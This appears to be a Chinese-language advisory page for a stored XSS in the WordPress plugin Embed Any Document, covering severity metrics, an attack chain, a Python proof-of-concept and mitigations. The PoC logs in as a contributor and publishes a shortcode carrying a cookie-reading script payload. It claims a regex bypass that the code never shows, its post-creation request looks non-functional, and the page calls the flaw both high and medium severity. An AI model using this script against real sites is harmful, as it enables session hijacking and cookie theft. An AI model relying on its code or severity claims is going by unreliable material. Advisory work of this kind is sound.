CVE-2025-12885 WordPress Embed Any Document插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12885

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Embed Any Document – Embed PDF, Word, PowerPoint and Excel Files (WordPress插件)

漏洞概述

CVE-2025-12885是WordPress插件Embed Any Document中的一个高危存储型跨站脚本(XSS)漏洞。该插件用于在WordPress网站中嵌入PDF、Word、PowerPoint和Excel文档。漏洞源于sanitize_pdf_src函数的正则表达式绕过，由于缺乏充分的输入清理和输出转义，攻击者可以注入任意Web脚本。攻击者需要具有Contributor级别或更高的权限即可利用此漏洞。成功利用后，攻击者可以在受影响页面中注入恶意JavaScript代码，当其他用户访问这些被注入的页面时，恶意脚本将在其浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的攻击。由于是存储型XSS，恶意脚本会持久存在于数据库中，危害范围广泛。此漏洞影响该插件2.7.10及之前所有版本，CVSS评分6.4，属于中危级别。

技术细节

漏洞存在于Embed Any Document插件的sanitize_pdf_src函数中。该函数负责处理PDF嵌入时的URL验证，但正则表达式存在安全缺陷，攻击者可以通过构造特定的输入绕过验证机制。具体而言，攻击者利用正则表达式的不严谨性，注入包含恶意JavaScript代码的payload。由于插件未对用户输入进行充分的HTML实体转义和URL参数过滤，被注入的脚本会被永久存储在WordPress数据库中。当其他用户访问包含恶意内容的页面时，浏览器会执行这些脚本。攻击者可通过此方式窃取用户Cookie、劫持会话、执行任意操作或重定向用户到恶意网站。漏洞的利用门槛较低，Contributor级别的认证用户即可发起攻击，无需管理员权限，这大大增加了漏洞的实际威胁程度。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress Contributor级别账户或通过社会工程获取凭据

STEP 2

步骤2

攻击者构造恶意payload，利用sanitize_pdf_src函数的正则表达式绕过漏洞

STEP 3

步骤3

在WordPress页面或文章中插入包含恶意JavaScript的嵌入文档短代码

STEP 4

步骤4

恶意脚本被存储到数据库中，发布带有XSS payload的内容

STEP 5

步骤5

当普通用户访问被注入的页面时，恶意JavaScript在其浏览器中执行

STEP 6

步骤6

攻击者通过XSS窃取用户Cookie、会话令牌或进行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-12885 PoC - Stored XSS via sanitize_pdf_src regex bypass
# Target: WordPress with Embed Any Document plugin <= 2.7.10

target_url = "http://target-wordpress-site.com"
username = "attacker_contributor"
password = "contributor_password"

# Step 1: Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/"
}

login_response = session.post(login_url, data=login_data)
if "wordpress_logged_in" not in session.cookies:
    print("[-] Login failed")
    exit(1)

print("[+] Login successful")

# Step 2: Create post with malicious payload
# Bypass regex in sanitize_pdf_src to inject XSS
post_url = f"{target_url}/wp-admin/post-new.php"

# Malicious payload that bypasses sanitize_pdf_src regex
# The payload exploits regex matching weakness
xss_payload = '<script>alert(document.cookie)</script>'

# Create post with embedded document containing XSS
post_data = {
    "post_title": "Malicious Document",
    "post_content": f'[embeddoc url="https://malicious-site.com/doc.pdf?src={xss_payload}" viewer="google"]',
    "post_status": "publish"
}

create_post = session.post(post_url, data=post_data)
if create_post.status_code == 200:
    print("[+] Malicious post created successfully")
    print(f"[+] XSS payload stored in database - will execute on page view")
else:
    print("[-] Failed to create post")

影响范围

Embed Any Document插件 < 2.7.11

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时措施：1) 临时禁用Embed Any Document插件；2) 使用Web应用防火墙(WAF)过滤恶意请求；3) 限制只有管理员才能创建和编辑嵌入文档内容；4) 启用双因素认证增强账户安全；5) 监控网站日志查找异常行为。